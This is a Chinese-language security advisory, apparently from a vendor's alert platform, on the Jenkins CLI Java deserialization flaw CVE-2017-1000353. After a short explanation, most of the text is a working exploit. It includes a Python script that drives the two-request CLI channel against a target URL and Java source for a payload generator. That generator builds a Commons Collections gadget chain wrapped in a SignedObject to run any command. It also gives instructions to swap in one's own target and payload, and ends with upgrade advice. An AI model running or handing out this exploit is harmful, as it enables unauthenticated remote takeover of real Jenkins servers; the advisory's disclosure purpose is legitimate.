【漏洞预警】Jenkins未验证代码执行_CVE-2017-1000353
匿名者 3103天前【漏洞预警】Jenkins未验证代码执行_CVE-2017-1000353
2017年5月1日Jenkins 2.32.1版本发现存在JAVA反序列化远程代码执行漏洞。利用该漏洞,攻击者者可以在未进行权限验证的情况下执行任意代码,提升系统权限控制系统。
Jenkins是一个开源软件项目,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。根据白帽汇FOFA系统显示,全球有44402对外开放的Jenkins。其中中国有3312个对外开放。该项目在国内许多互联网公司、高校等均有使用。
Jenkins 全球分布情况(仅为分布情况,非漏洞影响情况)
Jenkins 中国分布情况(仅为分布情况,非漏洞影响情况)
漏洞原理与危害
该漏洞允许远程攻击者发送构造好的序列化的Java SignedObject 对象到远程的Jenkins CLI,Jenkins Cli 将使用一个新的ObjectInputStream对象反序列化,进而可绕过黑名单保护机制,从而造成反序列化代码执行漏洞。触发该漏洞需要发送两次请求。
第一次请求启动一个双向通道会话,用于“download”来自服务器的数据,在HTTP头中“Session”用做channel标识符,“Side”则指定为“download/upload”。
第二次请求发送双向通道的组件,第一次请求的请求是被阻塞的,直到发送第二次请求。该请求会匹配HTTP头中的“Session”的值,该值为UUID码。
利用该漏洞,攻击者者可以在未进行权限验证的情况下执行任意代码,提升系统权限控制系统,可能对服务器造成破坏。
漏洞影响
暂无
漏洞POC
首先攻击者需要使用payload.jar 脚本创建一个序列化的代码执行payload。
以下脚本需要替换两处地方:
- 修改url变量为要攻击的目标
- 修改 “FILESER = open("jenkinspoc1.ser", "rb").read()” 中的jenkins_poc1.ser为自己的payload文件。
通过修改后的内容,执行后,你会看到以下的日志内容:
jenkins_poc1.py
import requests
import uuid
import threading
import time
import gzip
import urllib3
import zlib
proxies = {
# 'http': 'http://127.0.0.1:8090',
# 'https': 'http://127.0.0.1:8090',
}
URL='http://192.168.18.161:8080/cli'
PREAMLE='<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='
PROTO = '\x00\x00\x00\x00'
FILE_SER = open("jenkins_poc1.ser", "rb").read()
def download(url, session):
headers = {'Side' : 'download'}
headers['Content-type'] = 'application/x-www-form-urlencoded'
headers['Session'] = session
headers['Transfer-Encoding'] = 'chunked'
r = requests.post(url, data=null_payload(),headers=headers, proxies=proxies, stream=True)
print r.text
def upload(url, session, data):
headers = {'Side' : 'upload'}
headers['Session'] = session
headers['Content-type'] = 'application/octet-stream'
headers['Accept-Encoding'] = None
r = requests.post(url,data=data,headers=headers,proxies=proxies)
def upload_chunked(url,session, data):
headers = {'Side' : 'upload'}
headers['Session'] = session
headers['Content-type'] = 'application/octet-stream'
headers['Accept-Encoding']= None
headers['Transfer-Encoding'] = 'chunked'
headers['Cache-Control'] = 'no-cache'
r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies)
def null_payload():
yield " "
def create_payload():
payload = PREAMLE + PROTO + FILE_SER
return payload
def create_payload_chunked():
yield PREAMLE
yield PROTO
yield FILE_SER
def main():
print "start"
session = str(uuid.uuid4())
t = threading.Thread(target=download, args=(URL, session))
t.start()
time.sleep(1)
print "pwn"
#upload(URL, session, create_payload())
upload_chunked(URL, session, "asdf")
if __name__ == "__main__":
main()
payload.jar
import java.io.ObjectOutputStream;
import java.io.ObjectStreamException;
import java.io.Serializable;
import java.lang.reflect.Field;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.security.Signature;
import java.security.SignedObject;
import java.util.Comparator;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.concurrent.ConcurrentSkipListSet;
import java.util.concurrent.CopyOnWriteArraySet;
import net.sf.json.JSONArray;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.collection.AbstractCollectionDecorator;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.ReferenceMap;
import org.apache.commons.collections.set.ListOrderedSet;
public class Payload implements Serializable {
private Serializable payload;
public Payload(String cmd) throws Exception {
this.payload = this.setup(cmd);
}
public Serializable setup(String cmd) throws Exception {
final String[] execArgs = new String[] { cmd };
final Transformer[] transformers = new Transformer[] {
new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[] { String.class,
Class[].class }, new Object[] { "getRuntime",
new Class[0] }),
new InvokerTransformer("invoke", new Class[] { Object.class,
Object[].class }, new Object[] { null, new Object[0] }),
new InvokerTransformer("exec", new Class[] { String.class },
execArgs), new ConstantTransformer(1) };
Transformer transformerChain = new ChainedTransformer(transformers);
final Map innerMap = new HashMap();
final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
HashSet map = new HashSet(1);
map.add("foo");
Field f = null;
try {
f = HashSet.class.getDeclaredField("map");
} catch (NoSuchFieldException e) {
f = HashSet.class.getDeclaredField("backingMap");
}
f.setAccessible(true);
HashMap innimpl = (HashMap) f.get(map);
Field f2 = null;
try {
f2 = HashMap.class.getDeclaredField("table");
} catch (NoSuchFieldException e) {
f2 = HashMap.class.getDeclaredField("elementData");
}
f2.setAccessible(true);
Object[] array2 = (Object[]) f2.get(innimpl);
Object node = array2[0];
if (node == null) {
node = array2[1];
}
Field keyField = null;
try {
keyField = node.getClass().getDeclaredField("key");
} catch (Exception e) {
keyField = Class.forName("java.util.MapEntry").getDeclaredField(
"key");
}
keyField.setAccessible(true);
keyField.set(node, entry);
KeyPairGenerator keyPairGenerator = KeyPairGenerator.getInstance("DSA");
keyPairGenerator.initialize(1024);
KeyPair keyPair = keyPairGenerator.genKeyPair();
PrivateKey privateKey = keyPair.getPrivate();
PublicKey publicKey = keyPair.getPublic();
Signature signature = Signature.getInstance(privateKey.getAlgorithm());
SignedObject payload = new SignedObject(map, privateKey, signature);
JSONArray array = new JSONArray();
array.add("asdf");
ListOrderedSet set = new ListOrderedSet();
Field f1 = AbstractCollectionDecorator.class
.getDeclaredField("collection");
f1.setAccessible(true);
f1.set(set, array);
DummyComperator comp = new DummyComperator();
ConcurrentSkipListSet csls = new ConcurrentSkipListSet(comp);
csls.add(payload);
CopyOnWriteArraySet a1 = new CopyOnWriteArraySet();
CopyOnWriteArraySet a2 = new CopyOnWriteArraySet();
a1.add(set);
Container c = new Container(csls);
a1.add(c);
a2.add(csls);
a2.add(set);
ReferenceMap flat3map = new ReferenceMap();
flat3map.put(new Container(a1), "asdf");
flat3map.put(new Container(a2), "asdf");
return flat3map;
}
private Object writeReplace() throws ObjectStreamException {
return this.payload;
}
static class Container implements Serializable {
private Object o;
public Container(Object o) {
this.o = o;
}
private Object writeReplace() throws ObjectStreamException {
return o;
}
}
static class DummyComperator implements Comparator, Serializable {
public int compare(Object arg0, Object arg1) {
// TODO Auto-generated method stub
return 0;
}
private Object writeReplace() throws ObjectStreamException {
return null;
}
}
public static void main(String args[]) throws Exception{
if(args.length != 2){
System.out.println("java -jar payload.jar outfile cmd");
System.exit(0);
}
String cmd = args[1];
FileOutputStream out = new FileOutputStream(args[0]);
Payload pwn = new Payload(cmd);
ObjectOutputStream oos = new ObjectOutputStream(out);
oos.writeObject(pwn);
oos.flush();
out.flush();
}
}
CVE编号
CVE-2017-1000353
修复建议
- Jenkins 2.54版本中已经启用了基于远程CLI,并使用了新的协议,并默认启用。并添加了基于SSH的CLI。强烈推荐升级jenkins,并禁用远程CLI。
- 安装相关防护软件或使用相关防护设备,政府,教育网站可安装G01。
白帽汇会持续对该漏洞进行跟进。后续可持续关注nosec平台。
参考
[1] https://blogs.securiteam.com/index.php/archives/3171
北京白帽汇科技有限公司是一家专注于安全大数据、企业威胁情报,为企业提供尖端安全产品和服务的一家高科技互联网企业。 公司产品包括:EWSIS-企业web安全监控系统、ETSS-企业威胁感知系统、ANDERSEN-企业威胁感知平台(SAAS)、NOSEC-大数据安全协作平台。 可为企业提供:网站安全监控、企业资产收集、漏洞扫描、安全日志分析、员工邮箱泄露监测、企业威胁情报、应急响应、安全代维等解决方案和服务。
昵称
邮箱
最新评论